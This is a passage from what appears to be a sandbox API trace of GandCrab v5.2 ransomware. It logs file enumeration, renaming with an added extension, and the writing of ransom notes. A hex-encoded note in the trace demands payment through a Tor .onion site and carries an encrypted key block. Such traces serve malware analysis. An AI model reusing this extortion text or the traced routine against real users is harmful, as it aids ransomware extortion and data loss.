lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\d2ca4a09d2ca4deb61a.lock" [0073.951] lstrlenW (lpString=".titwmvjl") returned 9 [0073.951] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\d2ca4a09d2ca4deb61a.lock") returned 97 [0073.951] VirtualAlloc (lpAddress=0x0, dwSize=0x102, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.951] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 106 [0073.951] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\d2ca4a09d2ca4deb61a.lock") returned 97 [0073.951] lstrlenW (lpString=".lock") returned 5 [0073.951] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.951] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0073.952] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.952] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.952] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0073.952] lstrcmpW (lpString1="Managed", lpString2=".") returned 1 [0073.952] lstrcmpW (lpString1="Managed", lpString2="..") returned 1 [0073.952] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\", lpString2="Managed" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed" [0073.952] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\" [0073.952] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0073.952] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.952] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0073.952] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.953] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0073.953] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.953] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0073.953] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.953] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0073.953] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.953] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.953] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\\\TITWMVJL-DECRYPT.txt") returned 102 [0073.953] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0073.954] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x6